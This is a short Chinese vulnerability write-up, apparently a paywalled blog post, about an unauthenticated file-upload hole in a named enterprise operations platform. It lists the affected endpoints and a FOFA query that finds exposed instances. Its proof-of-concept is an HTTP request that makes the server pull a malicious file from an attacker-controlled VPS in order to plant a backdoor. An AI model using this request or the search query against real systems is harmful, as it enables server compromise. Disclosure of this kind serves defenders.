超级会员免费看
0x01 产品简介
某科聚网一体化运营平台是一种综合性的软件平台,旨在帮助企业实现运营管理的集中化、自动化和协同化。该平台通常提供一系列功能模块和工具,用于支持企业在销售、营销、客户关系管理、供应链管理、人力资源管理等方面的运营活动。
0x02 漏洞概述
某科聚网一体化运营平台 catchByUrl、ue/word、radioupload等接口存在文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传后门文件,执行任意指令,从而获取服务器权限。
0x03 复现环境
FOFA:body="thirdparty/ueditor/WordPaster"
0x04 漏洞复现
PoC-1
GET /resources/files/ue/catchByUrl?url=http://vpsip/恶意文件 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
Connection: close
订阅专栏 解锁全文
365
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
